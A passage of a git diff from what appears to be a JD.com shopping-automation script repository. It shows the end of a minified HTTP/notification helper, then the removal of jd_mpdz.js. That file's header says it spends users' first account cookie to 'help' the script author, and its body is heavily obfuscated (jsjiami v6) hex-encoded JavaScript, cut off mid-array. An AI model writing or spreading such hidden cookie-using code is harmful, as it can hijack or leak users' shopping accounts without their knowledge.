s=t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString();s&&this.ckjar.setCookieSync(s,null),e.cookieJar=this.ckjar}}catch(t){this.logErr(t)}}).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)}))}post(t,e=(()=>{})){if(t.body&&t.headers&&!t.headers["Content-Type"]&&(t.headers["Content-Type"]="application/x-www-form-urlencoded"),t.headers&&delete t.headers["Content-Length"],this.isSurge()||this.isLoon())this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.post(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)});else if(this.isQuanX())t.method="POST",this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t));else if(this.isNode()){this.initGotEnv(t);const{url:s,...i}=t;this.got.post(s,i).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>{const{message:s,response:i}=t;e(s,i,i&&i.body)})}}time(t,e=null){const s=e?new Date(e):new Date;let i={"M+":s.getMonth()+1,"d+":s.getDate(),"H+":s.getHours(),"m+":s.getMinutes(),"s+":s.getSeconds(),"q+":Math.floor((s.getMonth()+3)/3),S:s.getMilliseconds()};/(y+)/.test(t)&&(t=t.replace(RegExp.$1,(s.getFullYear()+"").substr(4-RegExp.$1.length)));for(let e in i)new RegExp("("+e+")").test(t)&&(t=t.replace(RegExp.$1,1==RegExp.$1.length?i[e]:("00"+i[e]).substr((""+i[e]).length)));return t}msg(e=t,s="",i="",r){const o=t=>{if(!t)return t;if("string"==typeof t)return this.isLoon()?t:this.isQuanX()?{"open-url":t}:this.isSurge()?{url:t}:void 0;if("object"==typeof t){if(this.isLoon()){let e=t.openUrl||t.url||t["open-url"],s=t.mediaUrl||t["media-url"];return{openUrl:e,mediaUrl:s}}if(this.isQuanX()){let e=t["open-url"]||t.url||t.openUrl,s=t["media-url"]||t.mediaUrl;return{"open-url":e,"media-url":s}}if(this.isSurge()){let e=t.url||t.openUrl||t["open-url"];return{url:e}}}};if(this.isMute||(this.isSurge()||this.isLoon()?$notification.post(e,s,i,o(r)):this.isQuanX()&&$notify(e,s,i,o(r))),!this.isMuteLog){let t=["","==============📣系统通知📣=============="];t.push(e),s&&t.push(s),i&&t.push(i),console.log(t.join("\n")),this.logs=this.logs.concat(t)}}log(...t){t.length>0&&(this.logs=[...this.logs,...t]),console.log(t.join(this.logSeparator))}logErr(t,e){const s=!this.isSurge()&&!this.isQuanX()&&!this.isLoon();s?this.log("",`❗️${this.name}, 错误!`,t.stack):this.log("",`❗️${this.name}, 错误!`,t)}wait(t){return new Promise(e=>setTimeout(e,t))}done(t={}){const e=(new Date).getTime(),s=(e-this.startTime)/1e3;this.log("",`🔔${this.name}, 结束! 🕛 ${s} 秒`),this.log(),(this.isSurge()||this.isQuanX()||this.isLoon())&&$done(t)}}(t,e)} diff --git a/jd_mpdz.js b/jd_mpdz.js deleted file mode 100755 index 51c37cc..0000000 --- a/jd_mpdz.js +++ /dev/null @@ -1,10 +0,0 @@ -/* -头文字j -默认助力ck1,ck1助力作者,最高10个助力 -10 5,7,9 * * * jd_mpdz.js -*/ - -var _0xodF='jsjiami.com.v6',_0xodF_=['‮_0xodF'],_0x1f94=[_0xodF,'\x4c\x52\x6a\x44\x75\x69\x56\x35','\x77\x36\x50\x44\x72\x63\x4f\x2f\x77\x71\x6b\x47','\x77\x71\x66\x44\x6a\x47\x41\x54\x66\x67\x3d\x3d','\x66\x4d\x4b\x67\x43\x73\x4b\x66\x50\x33\x39\x35\x77\x36\x54\x44\x74\x56\x50\x44\x6a\x4d\x4f\x42\x4b\x73\x4f\x6e\x57\x78\x6f\x75\x77\x34\x59\x78\x77\x35\x33\x44\x76\x30\x6a\x44\x72\x38\x4b\x45','\x77\x70\x2f\x44\x6f\x30\x4d\x37','\x65\x73\x4b\x32\x66\x30\x44\x44\x70\x51\x39\x56\x77\x36\x33\x44\x67\x53\x34\x73\x47\x55\x4c\x44\x6a\x6e\x7a\x44\x6f\x38\x4b\x71\x4f\x30\x77\x3d','\x4e\x45\x6a\x43\x67\x38\x4b\x62','\x4c\x63\x4b\x70\x42\x4d\x4b\x4c\x4b\x69\x67\x2f\x77\x35\x33\x44\x6a\x56\x54\x44\x6a\x63\x4f\x4b\x64\x4d\x4f\x76\x52\x51\x4d\x7a\x77\x34\x6c\x72\x77\x6f\x6a\x43\x71\x42\x54\x43\x76\x4d\x4f\x4d\x77\x36\x6f\x43\x77\x6f\x72\x44\x6e\x30\x6c\x42\x4b\x44\x68\x30\x42\x6d\x4d\x44\x77\x72\x37\x44\x73\x57\x67\x4b\x42\x51\x78\x66\x77\x37\x5a\x45\x77\x34\x49\x73\x47\x45\x37\x44\x6c\x6d\x2f\x44\x72\x38\x4b\x54\x77\x6f\x52\x41\x77\x6f\x6b\x78\x77\x35\x6a\x44\x69\x69\x77\x2b\x77\x35\x30\x71\x4c\x79\x39\x6c\x4b\x6b\x63\x51\x4d\x38\x4f\x4b\x77\x36\x4c\x44\x6d\x38\x4b\x38\x77\x34\x4a\x7a\x77\x37\x34\x37\x77\x34\x74\x6e\x43\x73\x4b\x68\x50\x6a\x37\x43\x68\x53\x4c\x43\x70\x7a\x58\x43\x6c\x73\x4b\x69\x77\x35\x6e\x44\x76\x6b\x38\x41\x77\x34\x2f\x43\x6d\x38\x4f\x44\x77\x36\x4d\x6e\x77\x35\x38\x5a\x59\x38\x4f\x4c\x77\x35\x2f\x43\x6e\x42\x6b\x55\x77\x6f\x35\x78\x61\x52\x58\x44\x76\x63\x4f\x57\x77\x70\x66\x43\x71\x6d\x4a\x37\x77\x6f\x78\x71\x61\x63\x4f\x70\x50\x6a\x58\x43\x74\x73\x4b\x4c\x77\x36\x4c\x44\x74\x42\x48\x44\x6b\x53\x4e\x66\x77\x71\x58\x43\x6a\x4d\x4b\x7a\x77\x72\x6f\x58\x77\x35\x73\x72\x4b\x6c\x51\x34\x77\x37\x66\x44\x6e\x63\x4b\x5a\x64\x79\x45\x73\x64\x4d\x4b\x6e\x46\x6a\x62\x43\x6b\x77\x48\x44\x70\x6e\x51\x37\x4f\x73\x4f\x44\x4b\x79\x4c\x43\x69\x79\x58\x43\x75\x38\x4f\x6c\x77\x71\x6f\x55\x61\x33\x66\x43\x72\x4d\x4b\x73\x77\x6f\x70\x51\x4f\x4d\x4f\x50\x77\x71\x6e\x44\x71\x30\x6f\x69\x77\x70\x66\x44\x6b\x46\x48\x44\x76\x38\x4f\x64\x58\x63\x4f\x4e\x50\x73\x4b\x2f\x77\x36\x54\x43\x67\x31\x54\x44\x68\x51\x3d\x3d','\x63\x42\x58\x43\x6f\x69\x2f\x43\x75\x41\x3d\x3d','\x57\x58\x76\x44\x6e\x63\x4b\x59\x77\x71\x64\x61\x77\x72\x30\x2b\x59\x48\x67\x79\x49\x7a\x33\x44\x73\x4d\x4f\x2f\x63\x52\x76\x44\x6e\x52\x6e\x43\x6c\x69\x45\x4b\x77\x70\x52\x6e\x61\x6c\x52\x56\x63\x38\x4f\x4b\x66\x38\x4f\x4c\x77\x35\x6a\x43\x75\x51\x39\x67\x43\x54\x6b\x2b\x52\x68\x44\x43\x6c\x63\x4f\x66\x54\x51\x39\x66\x77\x35\x46\x77','\x77\x36\x62\x44\x72\x57\x7a\x43\x6b\x73\x4b\x79\x77\x37\x55\x7a\x77\x35\x37\x44\x6c\x73\x4b\x68\x4f\x63\x4b\x42\x46\x73\x4f\x49\x77\x6f\x50\x44\x6e\x38\x4b\x72\x51\x4d\x4f\x79\x77\x34\x78\x4f\x77\x72\x2f\x44\x74\x45\x49\x3d','\x62\x4d\x4b\x74\x77\x37\x77\x41\x51\x67\x3d\x3d','\x49\x4d\x4b\x37\x62\x6c\x33\x44\x70\x41\x6c\x54\x77\x37\x2f\x43\x75\x79\x73\x70','\x77\x34\x51\x36\x77\x36\x38\x34\x57\x41\x3d\x3d','\x77\x35\x38\x35\x77\x35\x67\x55\x77\x6f\x4d\x3d','\x45\x73\x4b\x31\x58\x46\x58\x43\x69\x51\x3d\x3d','\x77\x6f\x76\x44\x76\x38\x4b\x63\x77\x71\x6c\x6a','\x4e\x54\x6e\x44\x72\x78\x30\x3d','\x77\x71\x66\x43\x6f\x6c\x63\x3d','\x56\x38\x4b\x6a\x57\x73\x4f\x72\x4e\x51\x3d\x3d','\x65\x63\x4b\x33\x4a\x4d\x4b\x78\x4d\x67\x3d\x3d','\x4d\x6d\x67\x6b\x44\x45\x6f\x3d','\x77\x36\x68\x65\x65\x79\x74\x70','\x48\x46\x44\x44\x6e\x30\x76\x44\x69\x51\x3d\x3d','\x77\x34\x6f\x63\x77\x35\x6f\x52\x66\x51\x3d\x3d','\x77\x34\x49\x6e\x77\x34\x6f\x30\x63\x51\x3d\x3d','\x61\x6a\x44\x43\x6a\x51\x3d\x3d','\x43\x63\x4f\x44\x64\x51\x46\x31','\x5a\x63\x4b\x61\x43\x38\x4b\x44\x47\x6a\x54\x44\x68\x51\x3d\x3d','\x41\x6e\x67\x4c\x4c\x33\x4d\x3d','\x47\x69\x50\x43\x73\x54\x48\x43\x75\x77\x3d\x3d','\x44\x38\x4f\x41\x55\x69\x74\x62','\x77\x71\x31\x30\x77\x72\x77\x3d','\x4a\x58\x66\x6c\x70\x37\x54\x6f\x74\x6f\x6c\x44\x48\x2b\x57\x50\x74\x75\x57\x59\x6d\x4d\x4f\x6d\x48\x77\x3d\x3d','\x64\x4d\x4b\x2f\x64\x38\x4f\x6d\x49\x4d\x4f\x6b','\x59\x44\x6e\x43\x73\x63\x4f\x4a\x45\x46\x6f\x61\x77\x6f\x7a\x43\x72\x32\x31\x74\x64\x6d\x6b\x41\x77\x37\x77\x4f\x5a\x77\x3d\x3d','\x77\x72\x52\x6a\x77\x70\x41\x33\x77\x36\x30\x3d','\x77\x37\x30\x31\x77\x34\x73\x64\x77\x70\x38\x3d','\x4c\x63\x4f\x44\x59\x78\x64\x2f','\x77\x34\x67\x4d\x77\x71\x64\x45\x4a\x6e\x50\x44\x74\x33\x58\x43\x70\x73\x4f\x6b\x77\x72\x72\x44\x68\x38\x4f\x67\x77\x36\x58\x43\x70\x52\x68\x54\x4a\x51\x3d\x3d','\x77\x72\x58\x44\x6f\x63\x4b\x44\x77\x36\x56\x4c\x47\x41\x3d\x3d','\x77\x35\x30\x30\x77\x37\x51\x79\x77\x70\x51\x51\x43\x33\x76\x43\x6f\x55\x35\x4d\x77\x34\x5a\x42\x5a\x4d\x4f\x63\x77\x72\x51\x6f','\x77\x6f\x72\x44\x6f\x4d\x4b\x44\x77\x72\x56\x31\x43\x43\x37\x44\x72\x32\x62\x43\x67\x56\x73\x69\x47\x51\x3d\x3d','\x77\x37\x72\x43\x71\x48\x76\x43\x6b\x38\x4b\x6c\x77\x37\x49\x70\x77\x34\x4c\x44\x73\x38\x4f\x34','\x58\x63\x4f\x5a\x77\x72\x38\x4b\x77\x72\x64\x76\x42\x41\x3d\x3d','\x63\x31\x66\x44\x72\x4d\x4b\x50\x77\x72\x38\x3d','\x54\x38\x4b\x6f\x77\x37\x34\x62\x57\x67\x3d\x3d','\x35\x4c\x6d\x4d\x35\x4c\x69\x68\x36\x4c\x2b\x56\x35\x5a\x71\x4b\x35\x4c\x71\x45\x35\x36\x71\x44\x35\x70\x61\x4b\x35\x6f\x2b\x64','\x56\x44\x2f\x43\x75\x67\x6c\x46','\x77\x71\x62\x44\x70\x58\x67\x5a\x51\x67\x3d\x3d','\x49\x52\x76\x43\x75\x68\x76\x43\x73\x77\x3d\x3d','\x59\x63\x4b\x35\x52\x63\x4f\x66\x4e\x41\x3d\x3d','\x77\x71\x62\x44\x6f\x63\x4b\x63\x77\x36\x33\x44\x67\x41\x3d\x3d','\x50\x73\x4f\x35\x77\x6f\x66\x43\x72\x79\x2f\x44\x68\x4d\x4f\x7a\x77\x35\x42\x4f\x77\x72\x35\x34\x77\x37\x78\x68\x77\x71\x77\x3d','\x77\x37\x4c\x44\x70\x73\x4b\x6a\x62\x69\x64\x6c\x48\x30\x76\x43\x6e\x33\x42\x6f\x77\x37\x67\x3d','\x4f\x48\x54\x44\x6b\x51\x3d\x3d','\x49\x54\x76\x43\x74\x30\x66\x44\x75\x67\x3d\x3d','\x49\x6a\x62\x44\x74\x51\x55\x32\x77\x35\x59\x59\x77\x36\x58\x44\x6a\x73\x4f\x78\x77\x6f\x4c\x43\x6c\x73\x4f\x4e\x77\x36\x67\x49\x50\x38\x4b\x6a','\x77\x6f\x33\x44\x67\x30\x6b\x7a\x65\x77\x3d\x3d','\x62\x4d\x4f\x4c\x77\x71\x51\x39\x77\x71\x51\x3d','\x66\x73\x4b\x62\x48\x4d\x4b\x51\x44\x48\x33\x43\x6d\x51\x6b\x61\x77\x34\x6f\x63\x4b\x4d\x4b\x4c\x64\x73\x4b\x32\x55\x54\x4e\x5a\x49\x6b\x70\x2b\x77\x36\x48\x43\x6b\x63\x4b\x70\x77\x6f\x70\x6a\x49\x6a\x4c\x44\x6c\x73\x4f\x35\x4b\x69\x66\x44\x71\x68\x58\x43\x70\x67\x3d\x3d','\x77\x6f\x68\x47\x77\x72\x37\x43\x6b\x55\x6f\x3d','\x58\x52\x50\x43\x74\x63\x4f\x67\x49\x41\x3d\x3d','\x77\x36\x50\x44\x6d\x38\x4f\x49\x77\x71\x59\x53','\x56\x4d\x4b\x46\x77\x72\x2f\x44\x75\x63\x4b\x72\x77\x36\x62\x44\x6f\x4d\x4b\x2b\x77\x72\x6e\x44\x67\x6e\x48\x44\x6e\x63\x4b\x54\x4d\x38\x4f\x66\x77\x71\x4c\x43\x6d\x63\x4f\x47\x42\x73\x4f\x31\x77\x72\x6b\x2f\x66\x73\x4b\x66','\x61\x4d\x4b\x36\x57\x63\x4f\x74','\x77\x37\x56\x48\x77\x72\x62\x43\x6c\x56\x44\x44\x73\x63\x4b\x72\x77\x6f\x5a\x6f\x65\x38\x4b\x2b\x77\x70\x62\x43\x74\x73\x4b\x62\x49\x38\x4f\x6c\x62\x44\x4c\x43\x6a\x67\x3d\x3d','\x77\x71\x46\x35\x53\x42\x41\x3d','\x4c\x63\x4b\x43\x42\x38\x4b\x45\x47\x69\x76\x43\x6d\x55\x38\x72\x77\x35\x49\x61\x61\x4d\x4b\x44\x61\x63\x4f\x73\x47\x53\x34\x42\x4c\x45\x4d\x31\x77\x37\x44\x43\x6d\x4d\x4b\x7a\x77\x70\x78\x6b\x4d\x6a\x50\x43\x68\x38\x4b\x68\x50\x7a\x37\x44\x74\x54\x6e\x44\x72\x42\x72\x44\x6d\x38\x4f\x74\x59\x48\x68\x4b\x50\x73\x4b\x7a\x77\x36\x44\x44\x69\x45\x54\x43\x75\x73\x4f\x6f\x4f\x4d\x4b\x4c\x77\x37\x30\x4b\x46\x6c\x4d\x74\x47\x4d\x4b\x4c\x50\x4d\x4b\x6e\x43\x38\x4b\x2b\x53\x45\x50\x44\x72\x4d\x4b\x68\x77\x6f\x30\x6a\x4d\x43\x6a\x44\x67\x4d\x4b\x52\x4c\x52\x37\x43\x68\x6c\x7a\x44\x75\x73\x4f\x41\x77\x71\x74\x38\x47\x6a\x4c\x44\x6d\x38\x4f\x6c\x77\x34\x72\x43\x75\x33\x7a\x43\x6d\x32\x73\x6b\x77\x36\x39\x7a\x77\x34\x33\x44\x72\x6b\x73\x4a\x50\x4d\x4b\x6a\x44\x44\x6e\x44\x6f\x30\x48\x43\x6a\x63\x4b\x59\x77\x6f\x7a\x44\x6d\x47\x44\x43\x67\x7a\x4a\x48\x5a\x41\x72\x44\x74\x63\x4f\x6f\x4a\x73\x4f\x46\x58\x73\x4f\x79\x54\x6a\x63\x49\x77\x35\x44\x43\x72\x38\x4b\x4a\x43\x4d\x4b\x58\x77\x34\x52\x41\x77\x35\x31\x67\x49\x57\x55\x33\x52\x78\x4e\x36\x77\x34\x62\x43\x72\x4d\x4b\x33\x55\x6a\x4a\x45\x77\x6f\x4a\x6a\x45\x79\x70\x6c\x59\x73\x4b\x52\x77\x35\x4c\x43\x75\x63\x4b\x42\x77\x34\x46\x33\x45\x77\x50\x44\x6e\x38\x4f\x47\x63\x73\x4f\x42\x77\x6f\x74\x2f\x45\x4d\x4b\x30\x64\x53\x74\x68\x4f\x4d\x4b\x6f\x77\x35\x42\x66\x77\x35\x6c\x2b\x4e\x73\x4f\x58\x54\x67\x4d\x4d\x77\x34\x73\x35\x64\x48\x34\x61\x77\x36\x4a\x53\x77\x34\x33\x43\x70\x73\x4b\x56\x77\x37\x72\x44\x6e\x73\x4b\x57\x59\x67\x3d\x3d','\x63\x63\x4f\x4f\x77\x70\x34\x38\x77\x72\x55\x3d','\x77\x71\x6c\x76\x77\x71\x39\x46\x77\x71\x45\x73\x77\x70\x6e\x43\x73\x68\x44\x43\x6b\x73\x4f\x58\x77\x35\x7a\x44\x74\x38\x4f\x4a\x47\x67\x52\x61\x77\x72\x55\x79\x77\x37\x4e\x50\x49\x52\x73\x78\x77\x70\x35\x62\x77\x71\x44\x43\x6e\x77\x2f\x44\x67\x4d\x4b\x6f\x41\x51\x74\x78\x77\x72\x64\x43\x77\x34\x4e\x66\x54\x38\x4b\x75\x64\x51\x37\x44\x6c\x73\x4b\x62\x4e\x73\x4b\x6d\x77\x37\x34\x3d','\x62\x33\x33\x43\x6d\x42\x5a\x53\x41\x78\x6a\x44\x6b\x73\x4f\x54\x77\x34\x49\x61\x66\x42\x2f\x43\x6c\x58\x76\x43\x6b\x38\x4b\x4f\x77\x34\x70\x49\x4f\x6e\x73\x50\x77\x36\x72\x44\x6f\x51\x3d\x3d','\x65\x52\x62\x43\x6b\x51\x6c\x71','\x63\x7a\x6a\x43\x6a\x78\x64\x46\x42\x41\x4c\x44\x6a\x73\x4f\x71\x77\x6f\x31\x43','\x57\x63\x4b\x46\x4c\x38\x4b\x65\x50\x67\x3d\x3d','\x77\x34\x2f\x43\x73\x79\x4d\x52\x77\x70\x4d\x3d','\x77\x6f\x33\x43\x68\x73\x4b\x74\x77\x37\x63\x6e','\x4d\x4d\x4b\x76\x52\x6e\x76\x43\x74\x77\x3d\x3d','\x77\x6f\x2f\x44\x6f\x63\x4b\x74\x77\x36\x54\x44\x68\x41\x3d\x3d','\x42\x57\x50\x43\x73\x73\x4b\x51\x77\x72\x67\x3d','\x5a\x54\x44\x43\x6a\x6a\x6b\x3d','\x4b\x4d\x4f\x2f\x77\x6f\x4c\x43\x72\x68\x59\x3d','\x66\x54\x6a\x43\x72\x73\x4f\x4a\x44\x41\x3d\x3d','\x4e\x7a\x7a\x44\x76\x51\x3d\x3d','\x77\x70\x68\x30\x77\x6f\x39\x59\x77\x72\x45\x3d','\x77\x71\x6c\x4d\x77\x71\x63\x3d','\x77\x71\x66\x44\x67\x38\x4b\x58\x77\x36\x4c\x44\x69\x41\x3d\x3d','\x77\x35\x46\x54\x65\x78\x5a\x62','\x77\x72\x66\x43\x71\x47\x46\x2f\x77\x70\x41\x3d','\x42\x63\x4f\x2f\x56\x73\x4f\x44\x77\x34\x55\x3d','\x65\x6b\x50\x44\x70\x73\x4b\x4d\x77\x72\x77\x3d','\x4d\x63\x4b\x49\x65\x45\x6a\x43\x68\x51\x3d\x3d','\x43\x4d\x4b\x68\x52\x46\x6e\x43\x67\x58\x77\x3d','\x77\x36\x50\x43\x69\x77\x55\x62\x77\x6f\x2f\x44\x6d\x44\x58\x44\x68\x63\x4b\x67\x43\x79\x66\x44\x70\x51\x52\x46\x77\x36\x58\x43\x6e\x7a\x4d\x3d','\x77\x6f\x72\x43\x67\x73\x4b\x52\x77\x36\x34\x31\x77\x35\x59\x45\x77\x6f\x62\x43\x75\x73\x4b\x77\x77\x72\x50\x43\x6e\x6a\x6e\x44\x6d\x33\x66\x44\x6f\x6b\x64\x6b','\x77\x72\x4c\x43\x6f\x6c\x42\x7a\x77\x72\x44\x43\x67\x67\x3d\x3d','\x66\x38\x4b\x42\x48\x4d\x4b\x46\x44\x53\x4c\x44\x68\x56\x49\x49\x77\x36\x67\x41\x61\x73\x4b\x44\x46\x4d\x4b\x31\x52\x6d\x6b\x3d','\x48\x32\x4d\x2b\x43\x30\x34\x70\x53\x63\x4f\x36\x53\x73\x4b\x6e\x77\x37\x62\x44\x71\x77\x6b\x3d','\x4f\x6a\x44\x44\x72\x6b\x33\x44\x6f\x73\x4f\x6b\x52\x54\x6e\x44\x74\x78\x30\x3d','\x77\x72\x50\x43\x73\x6b\x42\x6c\x77\x72\x6e\x43\x68\x55\x55\x3d','\x4d\x4d\x4f\x2f\x77\x6f\x34\x3d','\x47\x47\x6e\x43\x75\x63\x4b\x73\x77\x71\x6f\x31\x77\x37\x6f\x3d','\x51\x63\x4f\x37\x77\x6f\x59\x44\x77\x70\x6b\x3d','\x77\x71\x54\x43\x71\x45\x31\x6a','\x77\x37\x37\x44\x70\x73\x4b\x75\x4f\x6d\x63\x6f\x46\x46\x33\x43\x6e\x48\x64\x39\x77\x72\x73\x79\x77\x36\x4e\x39\x4f\x38\x4f\x55\x77\x35\x6e\x44\x69\x32\x41\x51\x77\x71\x4e\x4c\x77\x36\x41\x6c','\x77\x70\x6e\x44\x74\x48\x31\x46\x77\x70\x54\x44\x74\x79\x49\x4c\x77\x6f\x48\x44\x69\x63\x4b\x74\x46\x6d\x6a\x44\x6b\x38\x4b\x74\x77\x36\x67\x3d','\x77\x34\x50\x43\x68\x6b\x50\x43\x73\x73\x4b\x6e\x77\x36\x38\x74\x77\x36\x6e\x44\x6e\x38\x4f\x74\x64\x4d\x4f\x55\x56\x4d\x4b\x61','\x77\x70\x78\x30\x77\x37\x31\x48\x44\x4d\x4b\x46\x55\x7a\x7a\x43\x6a\x4d\x4f\x43\x77\x71\x31\x42\x77\x35\x56\x5a\x62\x33\x68\x42\x54\x4d\x4f\x35','\x4a\x44\x7a\x44\x72\x42\x6c\x7a\x77\x70\x55\x64\x77\x37\x54\x44\x67\x63\x4f\x79\x77\x6f\x33\x44\x6a\x63\x4f\x43\x77\x72\x64\x48\x4d\x38\x4f\x71\x53\x55\x44\x44\x6e\x4d\x4b\x67\x49\x6c\x45\x74\x63\x63\x4b\x2b\x77\x6f\x38\x56\x55\x63\x4b\x56\x77\x35\x51\x3d','\x4e\x4d\x4f\x6b\x77\x70\x33\x43\x75\x77\x76\x43\x6c\x38\x4b\x6f\x77\x70\x64\x31\x77\x71\x74\x79\x77\x36\x49\x70\x77\x72\x30\x74\x52\x4d\x4f\x49\x51\x31\x33\x43\x6f\x47\x4d\x36\x52\x7a\x6f\x41\x77\x37\x4d\x4d\x61\x58\x58\x44\x6e\x45\x56\x35\x77\x37\x73\x3d','\x77\x70\x54\x44\x70\x63\x4b\x36\x77\x36\x66\x43\x6a\x4d\x4f\x72\x43\x63\x4f\x56\x77\x35\x62\x44\x6a\x67\x3d\x3d','\x77\x6f\x35\x6f\x77\x71\x52\x30\x4d\x63\x4b\x54\x42\x6e\x76\x44\x6a\x4d\x4f\x36\x77\x71\x68\x56\x77\x6f\x73\x42\x66\x7a\x64\x63\x42\x73\x4b\x36\x77\x71\x77\x30\x77\x6f\x63\x71\x42\x78\x35\x43\x77\x72\x56\x2b\x55\x4d\x4b\x4d\x64\x32\x58\x44\x70\x63\x4f\x50\x77\x71\x74\x55\x53\x73\x4b\x35\x77\x35\x34\x71\x63\x38\x4b\x76\x4c\x73\x4b\x64\x77\x71\x44\x43\x75\x44\x42\x68\x52\x67\x64\x7a\x52\x32\x44\x44\x6c\x33\x6e\x44\x6f\x4d\x4f\x2b\x77\x71\x76\x43\x71\x33\x58\x44\x75\x63\x4b\x4d\x46\x45\x66\x44\x6a\x69\x6e\x44\x6f\x38\x4b\x69\x66\x38\x4b\x46\x77\x34\x6b\x61\x77\x37\x49\x56\x77\x70\x4c\x43\x72\x4d\x4b\x39\x77\x71\x6c\x6a\x77\x37\x4e\x41\x4f\x54\x44\x44\x6e\x6d\x77\x59\x77\x35\x58\x43\x70\x6b\x2f\x43\x75\x73\x4b\x49\x44\x73\x4b\x63\x77\x70\x4c\x44\x6c\x6b\x6f\x62\x51\x63\x4f\x7a\x41\x63\x4b\x54\x77\x34\x51\x4a','\x77\x6f\x76\x44\x75\x73\x4b\x44\x77\x71\x42\x30\x56\x33\x4c\x43\x74\x48\x6a\x43\x75\x46\x45\x2b\x57\x7a\x44\x44\x68\x38\x4f\x4b\x77\x6f\x76\x43\x73\x63\x4b\x33\x4e\x30\x78\x53\x77\x6f\x33\x44\x71\x4d\x4b\x73\x77\x70\x6f\x65\x77\x71\x5a\x51\x77\x34\x6a\x44\x67\x33\x64\x32\x4b\x46\x70\x2b\x52\x53\x50\x44\x6d\x38\x4b\x64\x77\x36\x6a\x43\x67\x42\x66\x44\x68\x31\x42\x77\x77\x36\x62\x44\x74\x4d\x4f\x75\x41\x68\x76\x43\x69\x4d\x4b\x37\x61\x48\x37\x43\x68\x4d\x4f\x4c','\x53\x46\x7a\x44\x74\x32\x33\x44\x67\x69\x6b\x6f\x53\x41\x72\x44\x76\x79\x62\x43\x6d\x77\x2f\x44\x71\x33\x4a\x61\x77\x37\x6e\x43\x6b\x69\x51\x3d','\x77\x35\x59\x76\x77\x37\x6b\x79\x77\x70\x51\x37\x45\x57\x7a\x43\x75\x51\x3d\x3d','\x77\x6f\x66\x44\x71\x38\x4f\x39\x77\x71\x34\x35\x77\x34\x4e\x67\x48\x6b\x63\x3d','\x54\x57\x63\x61\x77\x6f\x51\x43\x53\x52\x34\x3d','\x53\x4d\x4b\x63\x64\x63\x4f\x62\x4b\x56\x54\x44\x68\x77\x3d\x3d','\x58\x4d\x4f\x65\x77\x6f\x63\x56\x77\x71\x4d\x38\x52\x58\x37\x43\x71\x73\x4b\x4c\x77\x37\x67\x45\x50\x73\x4f\x34\x77\x70\x72\x44\x73\x56\x58\x43\x75\x63\x4f\x2b\x77\x37\x38\x47\x77\x35\x46\x31\x77\x37\x63\x61\x61\x73\x4f\x30\x49\x46\x31\x61\x62\x73\x4f\x48\x48\x73\x4b\x73\x77\x35\x66\x44\x6e\x56\x72\x43\x70\x63\x4f\x6f\x55\x7a\x41\x58\x58\x4d\x4f\x49\x45\x52\x70\x56\x4c\x53\x4e\x68\x77\x72\x66\x43\x6e\x58\x6c\x5a\x77\x37\x34\x51\x4c\x41\x3d\x3d','\x4f\x63\x4b\x31\x64\x4d\x4f\x32\x49\x73\x4f\x50\x44\x45\x55\x37\x77\x34\x38\x57\x63\x47\x76\x44\x6c\x63\x4f\x2b\x62\x63\x4f\x4c\x77\x70\x6b\x54','\x4a\x7a\x6e\x44\x70\x52\x42\x6f\x77\x72\x67\x56\x77\x36\x50\x44\x67\x77\x3d\x3d','\x77\x34\x50\x44\x71\x38\x4f\x33\x77\x71\x34\x35\x77\x35\x4a\x67\x47\x52\x45\x3d','\x55\x48\x30\x2f\x48\x56\x51\x54\x54\x63\x4f\x76\x51\x4d\x4f\x54\x77\x71\x6e\x43\x71\x78\x4d\x36\x44\x55\x68\x55\x77\x37\x62\x44\x72\x42\x45\x3d','\x77\x6f\x72\x44\x73\x38\x4b\x36\x77\x36\x58\x44\x76\x73\x4f\x6a\x41\x51\x3d\x3d','\x66\x43\x54\x43\x6f\x4d\x4f\x65\x50\x56\x59\x4e','\x77\x37\x46\x65\x65\x78\x78\x51','\x77\x71\x39\x2f\x77\x71\x44\x43\x70\x57\x45\x3d','\x45\x68\x6e\x44\x75\x43\x64\x31','\x43\x63\x4f\x4c\x62\x6a\x35\x31','\x77\x6f\x7a\x43\x71\x73\x4b\x62\x77\x37\x41\x35','\x77\x71\x7a\x44\x76\x73\x4b\x50\x77\x71\x42\x49','\x77\x72\x44\x44\x72\x63\x4b\x79\x77\x72\x78\x77','\x77\x6f\x70\x5a\x59\x43\x52\x79\x77\x34\x4c\x43\x6b\x38\x4f\x6a\x63\x42\x4d\x53\x59\x6b\x67\x4f\x55\x79\x4d\x31\x77\x70\x7a\x44\x67\x48\x70\x62\x65\x6a\x55\x35','\x51\x38\x4b\x36\x49\x63\x4b\x6b','\x54\x57\x4d\x76\x47\x6b\x73\x6a\x53\x4d\x4f\x6c\x46\x73\x4b\x5a\x77\x37\x48\x44\x71\x77\x39\x79\x4b\x58\x35\x43\x77\x35\x76\x43\x70\x77\x3d\x3d','\x48\x63\x4f\x55\x77\x71\x44\x43\x6a\x77\x3d\x3d','\x4d\x6a\x72\x43\x71\x73\x4f\x49\x42\x31\x4e\x47\x77\x70\x48\x43\x6a\x46\x64\x33\x64\x47\x6c\x39\x77\x71\x56\x52\x49\x4d\x4b\x70\x45\x38\x4f\x36\x47\x38\x4f\x56\x77\x34\x44\x43\x71\x54\x38\x32\x77\x36\x7a\x44\x71\x6d\x67\x42\x53\x38\x4b\x57\x77\x6f\x5a\x77\x4e\x63\x4b\x54\x77\x34\x63\x75\x77\x36\x56\x62\x56\x38\x4b\x35\x77\x6f\x35\x2b\x77\x6f\x4c\x44\x76\x4d\x4f\x48\x77\x34\x34\x35\x41\x38\x4f\x7a\x77\x72\x50\x43\x6f\x73\x4f\x43\x47\x4d\x4f\x4b\x77\x37\x38\x34\x77\x37\x6c\x42\x77\x72\x77\x54\x77\x36\x33\x44\x73\x63\x4b\x57\x77\x70\x77\x51\x77\x71\x55\x46\x77\x37\x39\x6e\x77\x36\x35\x64\x48\x38\x4f\x58\x77\x71\x48\x43\x71\x38\x4b\x4